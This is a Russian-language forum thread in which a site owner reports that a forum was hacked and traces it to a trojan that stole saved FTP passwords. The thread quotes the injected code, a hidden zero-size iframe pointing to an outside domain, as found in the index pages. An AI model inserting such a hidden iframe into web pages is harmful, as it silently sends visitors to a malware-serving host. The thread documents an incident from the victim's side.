Перейти к контенту
  • 0

Не оспео крыть форум уже хакнули

masya2000

Вопрос

Не могли бы вы мне помочь разобраться. Сегодня взломали форум. Отредактировали файл индекс index.php.

Адрес форума http://forum.fams.kz.

Спасибо

Рекомендуемые сообщения

• 0
В чём разобраться? Скорее всего вирусом утащили пароли с ващего компьютера.

• 0

А я думаю. Можете конечно зайти по ссылке "Документация" в шапке и проверить всой дистрибутив на дыры, но не думаю что это оно. Хотя всякое может быть. Ставьте все заплатки и заливайте index.php нормальный.

А почему вы так уверены?

• 0

Уверен потому что не новичек в этом деле - защищаюсь антивирями и фаерволлами.

Пароли то я конечно сменю по любому и на вирусы проверюсь не однократно но просто не хотелось бы допустить это во второй раз - ладно одну страничку грохнули а не все сразу

• 0

нашел подлеца

НОД32 в помойку

http://www.viruslist.com/ru/viruses/encycl...?virusid=147349

нод его не видит - завтра пойду покупать касперчега,

тварь стырила пароль с тотал командера у меня

в индексах стоял такой код

<!-- Footer Starts Here -->

<?php

include "footer.php";

?><!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->

• 0

:D Вот видите.

А что касается TС, то у него пароли очень просто хранятся и их постоянно тырят.

• 0
masya2000 не Вы первый из фанатов NOD 32 кто пострадал от подобных вирусов и их модификаций (а я то думал NOD уже справился с этим типом вирусов ему больше года точно), а как вспомнишь сообщения на форумах только и кричали "каспер отстой" "комп тормозит" ума нету настройки посмотреть и понять почему это происходит, но зато воображали себя крутыми перцами и не быдлом которое юзает авп :D)

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.